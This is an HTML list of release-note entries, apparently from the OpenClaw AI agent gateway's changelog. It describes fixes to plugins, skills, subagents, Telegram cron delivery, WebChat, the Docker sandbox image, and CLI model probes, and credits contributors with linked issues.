<li>Skills: require explicit <code>skills.entries.coding-agent.enabled</code> before exposing the bundled coding-agent skill, so installs with Codex on PATH but no OpenAI auth do not silently offer Codex delegation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341259220" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73358" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73358/hovercard" href="https://github.com/openclaw/openclaw/issues/73358">#73358</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LaFleurAdvertising/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LaFleurAdvertising">@LaFleurAdvertising</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Plugins/startup: treat manifestless Claude bundles as valid installed-plugin registry entries instead of stale missing manifests, so workspace bundles no longer force repeated derived registry rebuilds or noisy <code>plugins.entries.workspace</code> warnings during Gateway startup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341825054" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73433" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73433/hovercard" href="https://github.com/openclaw/openclaw/issues/73433">#73433</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AnneVoss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AnneVoss">@AnneVoss</a>.</li>
<li>Agents/subagents: preserve <code>sessions_yield</code> as a paused subagent state and ignore its wait text while freezing completion output, so parent sessions wait for the final post-compaction answer instead of receiving intermediate progress or <code>(no output)</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341601776" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73413" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73413/hovercard" href="https://github.com/openclaw/openclaw/issues/73413">#73413</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ask-sola/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ask-sola">@Ask-sola</a>.</li>
<li>Plugins/startup: precompute bundled runtime mirror fingerprints before taking the mirror lock and keep Docker bundled plugin runtime deps/mirrors in a Docker-managed volume instead of the Windows/WSL config bind mount, so cold starts avoid slow host-volume mirror writes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341089006" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73339" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73339/hovercard" href="https://github.com/openclaw/openclaw/issues/73339">#73339</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1yihui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1yihui">@1yihui</a>.</li>
<li>Plugins/runtime deps: refresh bundled runtime mirrors without deleting active import trees, so config-triggered restarts do not see transient missing plugin files during registration. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Channels/LINE: persist inbound image, video, audio, and file downloads in <code>~/.openclaw/media/inbound/</code> instead of temporary files so agents can still read LINE media after <code>/tmp</code> cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341315204" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73370" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73370/hovercard" href="https://github.com/openclaw/openclaw/issues/73370">#73370</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hijirii/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hijirii">@hijirii</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wenxu007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wenxu007">@wenxu007</a>.</li>
<li>CLI/plugins: keep bundled plugin installs out of <code>plugins.load.paths</code> while preserving install records, so install/inspect/doctor loops no longer warn about the current bundled plugin directory. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/plugins: scope <code>plugins inspect &lt;id&gt;</code> runtime loading to the matched plugin so single-plugin inspection does not load every plugin before checking the target. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/plugins: remove managed copied-path plugin directories during uninstall and plan uninstall from metadata instead of runtime-loading plugins, so plugin lifecycle commands avoid unnecessary bundled runtime-deps work. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Cron tool: infer the creating session's agentId for <code>cron.add</code> jobs when <code>agentId</code> is omitted or passed as undefined, keeping scheduled agentTurn jobs routed to the session agent; <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4043242041" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40571" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40571/hovercard" href="https://github.com/openclaw/openclaw/pull/40571">#40571</a> identified the guard bug and supplied the focused regression coverage. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ChanningYul/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ChanningYul">@ChanningYul</a>.</li>
<li>Cron/Telegram: add <code>--thread-id</code> to <code>openclaw cron add</code> and <code>openclaw cron edit</code>, preserving Telegram forum topic delivery targets across scheduled announcements. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112231006" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51581" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51581/hovercard" href="https://github.com/openclaw/openclaw/pull/51581">#51581</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4201006584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60373" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60373/hovercard" href="https://github.com/openclaw/openclaw/pull/60373">#60373</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204997315" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60890" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60890/hovercard" href="https://github.com/openclaw/openclaw/pull/60890">#60890</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ChunHao-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ChunHao-dev">@ChunHao-dev</a>.</li>
<li>Cron/Telegram: preserve session-derived Telegram topic thread IDs when isolated cron delivery explicitly targets the parent chat, keeping bare chat targets in the active forum topic without leaking stale topics to other chats. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4243631655" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64708" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64708/hovercard" href="https://github.com/openclaw/openclaw/pull/64708">#64708</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/addelh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/addelh">@addelh</a>.</li>
<li>Memory/compaction: keep pre-compaction memory-flush prompts runtime-only so session transcripts and <code>chat.history</code> no longer expose them as normal user turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4134199009" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54408" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54408/hovercard" href="https://github.com/openclaw/openclaw/issues/54408">#54408</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4185979464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58956" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58956/hovercard" href="https://github.com/openclaw/openclaw/issues/58956">#58956</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4061564416" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43567" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43567/hovercard" href="https://github.com/openclaw/openclaw/issues/43567">#43567</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/markgong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/markgong">@markgong</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/guoyuhang9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/guoyuhang9">@guoyuhang9</a>.</li>
<li>Control UI/WebChat: keep large attachment payloads out of Lit state and optimistic chat messages, using object URL previews plus send-time payload serialization so PDF/image uploads no longer trigger <code>RangeError: Maximum call stack size exceeded</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341266867" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73360" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73360/hovercard" href="https://github.com/openclaw/openclaw/issues/73360">#73360</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4133779613" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54378" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54378/hovercard" href="https://github.com/openclaw/openclaw/issues/54378">#54378</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4228443758" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63432" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63432/hovercard" href="https://github.com/openclaw/openclaw/issues/63432">#63432</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hejunhui-73/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hejunhui-73">@hejunhui-73</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ansub/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ansub">@Ansub</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/christianhernandez3-afk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/christianhernandez3-afk">@christianhernandez3-afk</a>.</li>
<li>Agents/Anthropic: cancel stalled Anthropic Messages SSE body reads when abort signals fire, so active-memory timeouts release transport resources instead of leaving hidden recall runs parked on <code>reader.read()</code>. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337826285" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72965" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72965/hovercard" href="https://github.com/openclaw/openclaw/issues/72965">#72965</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339750581" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73120" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73120/hovercard" href="https://github.com/openclaw/openclaw/pull/73120">#73120</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wdeveloper16/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wdeveloper16">@wdeveloper16</a>.</li>
<li>Control UI/WebChat: keep pending run and typing state attached to the active client run, so unowned inject/announce/side-result finals no longer unlock unrelated active runs while completed owned runs still clear promptly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4171808259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57795" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/57795/hovercard" href="https://github.com/openclaw/openclaw/issues/57795">#57795</a>; carries forward the narrow diagnosis from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4173312913" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57887" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57887/hovercard" href="https://github.com/openclaw/openclaw/pull/57887">#57887</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/haoyu-haoyu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/haoyu-haoyu">@haoyu-haoyu</a>.</li>
<li>Sandbox/Docker: stop satisfying a missing default sandbox image by tagging plain Debian as <code>openclaw-sandbox:bookworm-slim</code>, preserving the Python tooling required by sandbox write/edit helpers and directing users to build the default image. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4109522309" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51185" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51185/hovercard" href="https://github.com/openclaw/openclaw/issues/51185">#51185</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4071029208" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45108" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45108/hovercard" href="https://github.com/openclaw/openclaw/issues/45108">#45108</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4108362554" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51099" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51099/hovercard" href="https://github.com/openclaw/openclaw/issues/51099">#51099</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112362767" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51609" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51609/hovercard" href="https://github.com/openclaw/openclaw/issues/51609">#51609</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4170772851" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57713" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/57713/hovercard" href="https://github.com/openclaw/openclaw/issues/57713">#57713</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dpalis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dpalis">@dpalis</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Tin55FoilDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Tin55FoilDev">@Tin55FoilDev</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jbcohen2-coder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jbcohen2-coder">@jbcohen2-coder</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/macminihal-cyber/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/macminihal-cyber">@macminihal-cyber</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PraxoOnline/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PraxoOnline">@PraxoOnline</a>.</li>
<li>Control UI/WebChat: confirm toolbar New Session button resets before dispatching <code>/new</code> while leaving typed <code>/new</code> and <code>/reset</code> commands immediate. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4074850255" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45800" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45800/hovercard" href="https://github.com/openclaw/openclaw/issues/45800">#45800</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3992944943" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/27065" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/27065/hovercard" href="https://github.com/openclaw/openclaw/issues/27065">#27065</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161620254" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56611" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56611/hovercard" href="https://github.com/openclaw/openclaw/issues/56611">#56611</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4135743341" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54499" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54499/hovercard" href="https://github.com/openclaw/openclaw/issues/54499">#54499</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3993040551" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/27110" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/27110/hovercard" href="https://github.com/openclaw/openclaw/pull/27110">#27110</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aethnova/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aethnova">@aethnova</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kosta228-huli/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kosta228-huli">@kosta228-huli</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adambezemek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adambezemek">@adambezemek</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xss925175263/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xss925175263">@xss925175263</a> (xianshishan).</li>
<li>Agents/models: keep per-agent primary models strict when <code>fallbacks</code> is omitted, so probe-only custom providers are not tried as hidden fallback candidates unless the agent explicitly opts in. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341014684" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73332" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73332/hovercard" href="https://github.com/openclaw/openclaw/issues/73332">#73332</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/haumanto/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/haumanto">@haumanto</a>.</li>
<li>Gateway/models: add <code>models.pricing.enabled</code> so offline or restricted-network installs can skip startup OpenRouter and LiteLLM pricing-catalog fetches while keeping explicit model costs working. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4127063527" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53639" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53639/hovercard" href="https://github.com/openclaw/openclaw/issues/53639">#53639</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/callebtc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/callebtc">@callebtc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/palewire/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/palewire">@palewire</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rjdjohnston/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rjdjohnston">@rjdjohnston</a>.</li>
<li>Gateway/startup: warn when legacy <code>CLAWDBOT_*</code> or <code>MOLTBOT_*</code> environment variables are still present, pointing users to <code>OPENCLAW_*</code> names instead of failing silently. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4125716584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53482" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53482/hovercard" href="https://github.com/openclaw/openclaw/issues/53482">#53482</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4127532557" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53667" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/53667/hovercard" href="https://github.com/openclaw/openclaw/pull/53667">#53667</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lndyzwdxhs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lndyzwdxhs">@lndyzwdxhs</a>.</li>
<li>Onboarding: pin interactive and non-interactive health checks to the just-configured setup token/password so stale <code>OPENCLAW_GATEWAY_TOKEN</code> or <code>OPENCLAW_GATEWAY_PASSWORD</code> values do not produce false gateway-token-mismatch failures after setup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331051996" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72203" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72203/hovercard" href="https://github.com/openclaw/openclaw/issues/72203">#72203</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galiniliev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galiniliev">@galiniliev</a>.</li>
<li>Doctor/state: require an interactive confirmation before archiving orphan transcript files, so <code>openclaw doctor --fix</code> no longer silently renames recoverable session history after upgrades regenerate <code>sessions.json</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339670365" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73106" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73106/hovercard" href="https://github.com/openclaw/openclaw/issues/73106">#73106</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scottgl9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scottgl9">@scottgl9</a>.</li>
<li>Cron/Telegram: preserve explicit <code>:topic:</code> delivery targets over stale session-derived thread IDs when isolated cron announces to Telegram forum topics. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187348607" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59069" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59069/hovercard" href="https://github.com/openclaw/openclaw/pull/59069">#59069</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4093910899" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49704" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/49704/hovercard" href="https://github.com/openclaw/openclaw/pull/49704">#49704</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4062796590" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43808" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43808/hovercard" href="https://github.com/openclaw/openclaw/pull/43808">#43808</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roytong9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roytong9">@roytong9</a>.</li>
<li>Build/runtime: write the runtime-postbuild stamp after <code>pnpm build</code> writes the build stamp, so the next CLI invocation does not re-sync runtime artifacts after a successful build. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339964556" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73151" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73151/hovercard" href="https://github.com/openclaw/openclaw/issues/73151">#73151</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>.</li>
<li>Build/runtime: preserve staged bundled-plugin runtime dependency caches across source-checkout tsdown rebuilds, so local CLI and gateway-watch rebuilds no longer recreate large plugin dependency trees before starting. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340343701" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73205" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73205/hovercard" href="https://github.com/openclaw/openclaw/pull/73205">#73205</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>CLI/channels: list configured chat channel accounts from read-only setup metadata even when the standalone CLI has not loaded the runtime channel registry, so <code>openclaw channels list</code> shows Telegram accounts before auth providers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340934976" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73319" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73319/hovercard" href="https://github.com/openclaw/openclaw/issues/73319">#73319</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340939351" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73322" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73322/hovercard" href="https://github.com/openclaw/openclaw/issues/73322">#73322</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mlaihk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mlaihk">@mlaihk</a>.</li>
<li>CLI/model probes: keep <code>infer model run --gateway</code> raw by skipping prior session transcript, bootstrap context, context-engine assembly, tools, and bundled MCP servers, so local backends can be tested without full agent-context overhead. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340882752" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73308" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73308/hovercard" href="https://github.com/openclaw/openclaw/issues/73308">#73308</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ScientificProgrammer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ScientificProgrammer">@ScientificProgrammer</a>.</li>
<li>CLI/image describe: pass <code>--prompt</code> and <code>--timeout-ms</code> through <code>infer image describe</code> and <code>describe-many</code>, so custom vision instructions and slow local model budgets reach media-understanding providers such as Ollama, OpenAI, Google, and OpenRouter. Addresses <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231557359" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63700" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63700/hovercard" href="https://github.com/openclaw/openclaw/issues/63700">#63700</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cedricjanssens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cedricjanssens">@cedricjanssens</a>.</li>
<li>Providers/Ollama: reject long non-linguistic Kimi/GLM symbol runs as provider failures instead of storing them as successful visible assistant replies, so fallback or error handling can recover from garbled cloud output. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4238583929" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64262" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64262/hovercard" href="https://github.com/openclaw/openclaw/issues/64262">#64262</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4266745361" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67019" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67019/hovercard" href="https://github.com/openclaw/openclaw/issues/67019">#67019</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kloz813/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kloz813">@Kloz813</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiaomenger123/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiaomenger123">@xiaomenger123</a>.</li>
<li>CLI/model probes: reject empty or whitespace-only <code>infer model run --prompt</code> values before calling local providers or the Gateway, so smoke checks do not spend provider calls on invalid turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340232392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73185" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73185/hovercard" href="https://github.com/openclaw/openclaw/issues/73185">#73185</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iot2edge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iot2edge">@iot2edge</a>.</li>
